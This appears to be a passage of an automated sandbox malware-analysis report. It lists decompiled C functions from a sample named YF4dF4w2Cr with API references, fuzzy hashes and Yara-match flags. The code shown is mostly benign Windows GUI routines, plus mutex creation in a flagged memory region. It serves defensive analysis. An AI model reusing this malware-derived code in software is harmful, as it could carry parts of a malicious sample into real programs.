                  				_t34 =  *((intOrPtr*)( *_t60 + 0x194))(E00408C1D(_t44, _t60, _t66,  *(_t62 + 0xc), _t44),  *((intOrPtr*)(_t62 + 8)),  *(_t62 + 0xc), 0x46279c,  *((intOrPtr*)(_t62 + 0x10)),  *((intOrPtr*)(_t62 + 0x14)));
                  				_t61 = 0;
                  				if(_t34 != 0) {
                  					_t61 = 1;
                  				}
                  				E004010B0( *((intOrPtr*)(_t62 + 8)) + 0xfffffff0, _t56);
                  				E004010B0( *((intOrPtr*)(_t62 - 0x10)) + 0xfffffff0, _t56);
                  				return E00431B73(_t61);
                  			}












                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction ID: 4482dd84e3e1f924aac8e1e3bd257dd37003dfc8241748aaaf4d51b636d97771
                  • Opcode Fuzzy Hash: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction Fuzzy Hash: 88219F34600609EBDF00EF61C891FAF77A1EF04354F10452AF91A6B3E1DB749940DBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E004247D7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t21;
                  				intOrPtr _t23;
                  				intOrPtr* _t26;
                  				intOrPtr* _t29;
                  				intOrPtr _t32;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				void* _t43;
                  				void* _t44;
                  
                  				_push(8);
                  				E00431ACE(E0044C0BF, __ebx, __edi, __esi);
                  				_t43 = __ecx;
                  				_t41 =  *((intOrPtr*)(_t44 + 8));
                  				if(_t41 != 0) {
                  					_t21 = E00424500(__ecx + 0x1c, _t41, __ecx, _t41);
                  					__eflags = _t21;
                  					if(_t21 == 0) {
                  						_t21 = E00424500(__ecx + 0x38, _t41, __ecx, _t41);
                  						__eflags = _t21;
                  						if(_t21 == 0) {
                  							_t23 = E0040444A(E0041FD51);
                  							 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                  							_t36 = _t43 + 4;
                  							 *((intOrPtr*)(_t44 + 8)) = _t23;
                  							_t32 = E0042FBA4(_t43 + 4);
                  							__eflags = _t32;
                  							if(__eflags == 0) {
                  								E004063FE(_t32, _t36, _t41, _t43, __eflags);
                  							}
                  							 *((intOrPtr*)(_t43 + 0x14))(_t32);
                  							_t26 = E004246C7(_t32, _t43 + 0x38, _t41); // executed
                  							 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                  							 *_t26 = _t32;
                  							E0040444A( *((intOrPtr*)(_t44 + 8)));
                  							_t29 =  *((intOrPtr*)(_t43 + 0x58)) + _t32;
                  							 *_t29 = _t41;
                  							__eflags =  *((intOrPtr*)(_t43 + 0x5c)) - 2;
                  							if( *((intOrPtr*)(_t43 + 0x5c)) == 2) {
                  								 *((intOrPtr*)(_t29 + 4)) = _t41;
                  							}
                  							_t21 = _t32;
                  						} else {
                  							_t39 =  *((intOrPtr*)(__ecx + 0x58)) + _t21;
                  							 *_t39 = _t41;
                  							__eflags =  *((intOrPtr*)(__ecx + 0x5c)) - 2;
                  							if( *((intOrPtr*)(__ecx + 0x5c)) == 2) {
                  								 *((intOrPtr*)(_t39 + 4)) = _t41;
                  							}
                  						}
                  					}
                  				} else {
                  					_t21 = 0;
                  				}
                  				return E00431B73(_t21);
                  			}













                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_catch
                  • String ID:
                  • API String ID: 3886170330-0
                  • Opcode ID: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction ID: 9197f78ff889db5bb5e608a4bb7d9c8daaa65afafdfa0369e7aef5d3225350aa
                  • Opcode Fuzzy Hash: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction Fuzzy Hash: 5111C1747007509BC720EF26E94166AB7E0EFD1318B90853EE942976A1EB38E905CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00412F2D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t19;
                  				intOrPtr _t24;
                  				intOrPtr* _t27;
                  				void* _t30;
                  				signed int* _t32;
                  				void* _t33;
                  
                  				_t20 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044B3B5, __ebx, __edi, __esi);
                  				_t30 = __ecx;
                  				 *((intOrPtr*)(__ecx + 0xcc)) = 0x451568;
                  				_t32 = 0x451510;
                  				do {
                  					_t16 =  *(_t33 + 8) &  *_t32;
                  					if(( *(_t33 + 8) &  *_t32 & 0x0000f000) != 0) {
                  						_t5 = _t32 - 4; // 0xe81b
                  						_t16 = E00409833(_t30,  *_t5);
                  						_t36 = _t16;
                  						if(_t16 == 0) {
                  							_t24 = E00404461(_t36, 0xc4);
                  							 *((intOrPtr*)(_t33 - 0x10)) = _t24;
                  							 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
                  							_t37 = _t24;
                  							if(_t24 == 0) {
                  								_t19 = 0;
                  								__eflags = 0;
                  							} else {
                  								_t19 = E004133F9(_t20, _t24, _t30, _t32, _t37, 0);
                  							}
                  							_t9 = _t32 - 4; // 0xe81b
                  							_push( *_t9);
                  							 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                  							_push( *_t32 | 0x56000000);
                  							_push(_t30);
                  							_t27 = _t19; // executed
                  							if( *((intOrPtr*)( *_t19 + 0x17c))() == 0) {
                  								_t16 = E0042280E(_t27);
                  							}
                  						}
                  					}
                  					_t32 =  &(_t32[2]);
                  				} while (_t32 < "iDockFrameWnd");
                  				return E00431B73(_t16);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00412F34
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 004133F9: __EH_prolog3.LIBCMT ref: 00413400
                    • Part of subcall function 004133F9: SetRectEmpty.USER32(?), ref: 00413450
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$EmptyRect_malloc
                  • String ID:
                  • API String ID: 1428422903-0
                  • Opcode ID: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction ID: 60c52bf7d0ee18840f249dcd26fc2cf3d101614bcbc1bdb70064cbc4ec598c8f
                  • Opcode Fuzzy Hash: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction Fuzzy Hash: 66014C31700205ABEB18EF21C9167AEB2B0AF40304F00462FE856D73D1EBBC8D51965D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 44%
                  			E004134C3(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				struct tagRECT* _v12;
                  				char _v28;
                  				void* __ebx;
                  				void* __edi;
                  				struct tagRECT* _t17;
                  				void* _t19;
                  				void* _t20;
                  				intOrPtr* _t30;
                  
                  				_t20 = __ecx;
                  				_v8 =  *(__ecx + 0xb0);
                  				_t17 = __ecx + 0xb4;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_t30 = _a8;
                  				_v12 = _t17;
                  				 *(__ecx + 0xb0) = 0 |  *_t30 == 0x00000000;
                  				CopyRect(_t17, _t30 + 4);
                  				_t19 = E004217B7(_t20, _t20,  &_v28, _a4, _t30); // executed
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *(_t20 + 0xb0) = _v8;
                  				return _t19;
                  			}













                  APIs
                  • CopyRect.USER32 ref: 00413500
                    • Part of subcall function 004217B7: CopyRect.USER32 ref: 004217F2
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction ID: cc5e8473d09934e6d7ff24cff4c9ac1d1a160460a925aeff77e35e501553fd45
                  • Opcode Fuzzy Hash: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction Fuzzy Hash: CC018176900704ABCB05DF99D8819DBBBBAFF46320F04017EFD0AAB201D7716A04CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E00427502(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t16;
                  				void* _t18;
                  				void* _t21;
                  				void* _t29;
                  				intOrPtr* _t34;
                  				void* _t35;
                  
                  				_push(0x7c);
                  				E00431A9B(E0044C3A0, __ebx, __edi, __esi);
                  				_t16 =  *((intOrPtr*)(__ecx + 0x10));
                  				_t37 = _t16;
                  				if(_t16 != 0) {
                  					__eflags = _t16 - 1;
                  					_t31 =  *((intOrPtr*)(__ecx + 8));
                  					_t34 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 8));
                  					if(_t16 <= 1) {
                  						L5:
                  						_t18 =  *((intOrPtr*)( *_t34 + 0x80))(0, 1);
                  					} else {
                  						E00427285(_t35 - 0x88, __ecx + 4);
                  						 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                  						_t21 = E00417C2D(__ebx, _t35 - 0x88, _t31, __edi, _t34, __eflags);
                  						 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t35 - 0x88)) = 0x4540cc;
                  						_t29 = _t35 - 0x88;
                  						__eflags = _t21 - 1;
                  						if(__eflags != 0) {
                  							_t18 = E004174FB(_t29, __edi, _t34, __eflags);
                  						} else {
                  							_t34 =  *((intOrPtr*)(_t35 - 0x10));
                  							E004174FB(_t29, __edi, _t34, __eflags);
                  							goto L5;
                  						}
                  					}
                  				} else {
                  					_push(0xffffffff);
                  					_push(_t16);
                  					_push(0xf104);
                  					_t18 = E00417146(__ebx, __edx, __edi, __esi, _t37);
                  				}
                  				return E00431B73(_t18);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427509
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004174FB: __EH_prolog3.LIBCMT ref: 00417502
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction ID: ca7fd307f2be72a3752cab3f0bceb8ec595584913dc78adcf506fcae19c16127
                  • Opcode Fuzzy Hash: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction Fuzzy Hash: 66018830604121D7DB10EB15C881BADB330BF00318FA085DAF5569B1D1CF7DAEC58B49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0040492C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t25;
                  				struct HWND__* _t26;
                  				struct HWND__* _t28;
                  				void* _t35;
                  				void* _t36;
                  
                  				_t36 = __eflags;
                  				_push(0x14);
                  				_push(0x45b0a0);
                  				E00431818(__ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t35 - 0x20)) = 0;
                  				_t25 = E0041EAD7( *((intOrPtr*)(E0041F363(0, __edi, __esi, _t36) + 0x80)), _t35 - 0x20);
                  				 *((intOrPtr*)(_t35 - 0x24)) = _t25;
                  				 *(_t35 - 0x1c) = 0;
                  				if(_t25 != 0) {
                  					 *((intOrPtr*)(_t35 - 4)) = 0;
                  					_t26 = CreateWindowExA( *(_t35 + 8),  *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
                  					 *(_t35 - 0x1c) = _t26;
                  					 *((intOrPtr*)(_t35 - 4)) = 0xfffffffe;
                  					E004049A6(0);
                  					_t28 =  *(_t35 - 0x1c);
                  				} else {
                  					_t28 = 0;
                  				}
                  				return E0043185D(_t28);
                  			}









                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction ID: 904469578396c1f20cc798ad30f63f77ac122cb8e5fcb475f2898160d20664ef
                  • Opcode Fuzzy Hash: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction Fuzzy Hash: 2E01A57280020DAFCF41AFE5CD419DE7B71FF0C318F50452AFA6461161D3398961AF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 023EA989
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: d86e5228b973533d9d0a2a61df652d1c506df3dd96736626f5cc50f93167a25d
                  • Instruction ID: 7ddbdf5ca4065607d7babb04aa46da9348532a31978025b93a7f56020f30b355
                  • Opcode Fuzzy Hash: d86e5228b973533d9d0a2a61df652d1c506df3dd96736626f5cc50f93167a25d
                  • Instruction Fuzzy Hash: D2F05CB1A4521457DF14666C7C01B6E369DDB04300F40042AF74EDA2C4EE20DC288BD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 023EA930
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: 6e7bff0efdee80e7675404408f21c36bb995e0c9a54f259dd8b60cc84c7896ce
                  • Instruction ID: 5d1ad09cff5276258ec9b988f17c148f9ef861614366331cf2de2e94d96a275e
                  • Opcode Fuzzy Hash: 6e7bff0efdee80e7675404408f21c36bb995e0c9a54f259dd8b60cc84c7896ce
                  • Instruction Fuzzy Hash: B3F0EC72A4421457DF54666C7C05B6A36ADDB44704F40446AFB4ED62C4EE219C248BD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040F720(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				void* _t10;
                  				long _t11;
                  				void* _t15;
                  				void* _t16;
                  				struct HWND__* _t18;
                  
                  				if(_a8 != 0x360) {
                  					_t18 = _a4;
                  					_t10 = E0040EE68(_t15, _t16, _t18, __eflags, _t18);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						L5:
                  						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
                  						L6:
                  						return _t11;
                  					}
                  					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
                  					if(__eflags != 0) {
                  						goto L5;
                  					}
                  					_t11 = E0040F62D(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
                  					goto L6;
                  				}
                  				return 1;
                  			}











                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction ID: 2fdbec0b4a9ad72505348fdeb0c78ac9bbf9b9846fb0107a17cd17812a59923d
                  • Opcode Fuzzy Hash: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction Fuzzy Hash: 6BF08232000119FBCF226FA18D048DB3BA9FF08351F008436FA14A2450C379C525DBAB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00408BCA(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				signed int _t6;
                  				intOrPtr* _t16;
                  
                  				_t16 = __ecx;
                  				_t6 = E0040ED96(__ecx, __eflags);
                  				if(_t6 != 0xffffffff) {
                  					_t6 =  *((intOrPtr*)( *_t16 + 0x174))(_a4, _a8);
                  					__eflags = _t6;
                  					if(_t6 == 0) {
                  						goto L1;
                  					}
                  					PostMessageA( *(_t16 + 0x20), 0x362, 0xe001, 0); // executed
                  					 *((intOrPtr*)( *_t16 + 0x150))(1);
                  					__eflags = 0;
                  					return 0;
                  				}
                  				L1:
                  				return _t6 | 0xffffffff;
                  			}






                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction ID: 84aef6605057a435e7b508d2a4ac3e57ad12db9fb388b43368d2a12da25d0cd9
                  • Opcode Fuzzy Hash: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction Fuzzy Hash: D1F0A030344600ABDB211B758C09F9A7BA5FF49731F110A3AF9A5AA2E1CAB6D8508A45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004074CB(void* __ecx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr _t12;
                  				signed char _t14;
                  				signed char* _t17;
                  
                  				_t17 = __ecx + 0x84;
                  				_t14 =  *_t17;
                  				 *_t17 = _t14 & 0xfffff0ff; // executed
                  				_t12 = E0042143D(__ecx, _a4); // executed
                  				 *_t17 = _t14;
                  				if((_t14 & 0x00000004) != 0) {
                  					_t12 = _a4;
                  					if(( *(_t12 + 0x18) & 0x00000001) == 0) {
                  						return InvalidateRect( *(__ecx + 0x20), 0, 1);
                  					}
                  				}
                  				return _t12;
                  			}







                  APIs
                    • Part of subcall function 0042143D: DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                    • Part of subcall function 0042143D: GetWindowRect.USER32 ref: 0042146C
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214AC
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214D2
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421512
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421534
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00407505
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction ID: a7cd9ca6abd962d82728a90d354626cd2234a4d826fdd58f6502a378ddc358a9
                  • Opcode Fuzzy Hash: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction Fuzzy Hash: BEF0A0B2204205BBC7215F19DC85FC2BFA4EF54360F24012AF694572A1C776A880C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404CB4(intOrPtr* __ecx, intOrPtr _a4) {
                  				void* _t6;
                  				intOrPtr* _t20;
                  
                  				_t20 = __ecx;
                  				_t6 = 0;
                  				if( *((intOrPtr*)(__ecx + 0x5c)) == 0) {
                  					_t6 = E004049DB(_t9, GetMenuItemCount( *( *((intOrPtr*)( *__ecx + 0x6c))() + 4)));
                  				}
                  				return  *((intOrPtr*)( *_t20 + 0x194))(_a4, _t6);
                  			}






                  APIs
                  • GetMenuItemCount.USER32 ref: 00404CCE
                    • Part of subcall function 004049DB: GetSubMenu.USER32 ref: 004049E6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CountItem
                  • String ID:
                  • API String ID: 3435231853-0
                  • Opcode ID: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction ID: 2bd0770f7da49b8842ae51bb064b07c5258a274e3421cbc5c2ea82824ae108bd
                  • Opcode Fuzzy Hash: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction Fuzzy Hash: 35E06D72200104AFD7106B25C808C7ABBAAEF94321301403BF949C3210CB349C529B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041481D(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                  				void* __edi;
                  				intOrPtr* _t11;
                  				void* _t13;
                  				void* _t16;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  
                  				_t18 = _a4;
                  				_t17 = __ecx;
                  				if(_t18 >= 0) {
                  					_t11 = E0043108C(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
                  					if(_t11 == 0) {
                  						goto L1;
                  					}
                  					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
                  					 *_t11 = _t17;
                  					 *((intOrPtr*)(_t11 + 0xc)) = 1;
                  					 *((intOrPtr*)(_t11 + 8)) = _t18;
                  					return _t11;
                  				}
                  				L1:
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _malloc
                  • String ID:
                  • API String ID: 1579825452-0
                  • Opcode ID: dd6bd1b736eb428f6ac66092488aa0dafb57e017dd4b37dcf2df1ae9fd136421
                  • Instruction ID: af9e8d2a6ecd8cac88a5fa1c94de59ea43d9a8c68d6b0a2cc1d4c79a81d680ff
                  • Opcode Fuzzy Hash: dd6bd1b736eb428f6ac66092488aa0dafb57e017dd4b37dcf2df1ae9fd136421
                  • Instruction Fuzzy Hash: 34E06D765006169BC7009F4AD504A86BBECEFA1375F16846BE408CB662C675E885CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040547D(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                  				void* _t5;
                  				void* _t13;
                  				intOrPtr _t14;
                  				intOrPtr* _t16;
                  
                  				_t16 = __ecx;
                  				_t5 = E0040ED96(__ecx, __eflags);
                  				if(_t5 != 0) {
                  					_t14 = _a4;
                  					 *((intOrPtr*)( *_t16 + 0x64))(_t14, _t13);
                  					SetWindowLongA( *(_t16 + 0x20), 0xffffffec,  *(_t14 + 0x2c)); // executed
                  					return 1;
                  				}
                  				return _t5;
                  			}








                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
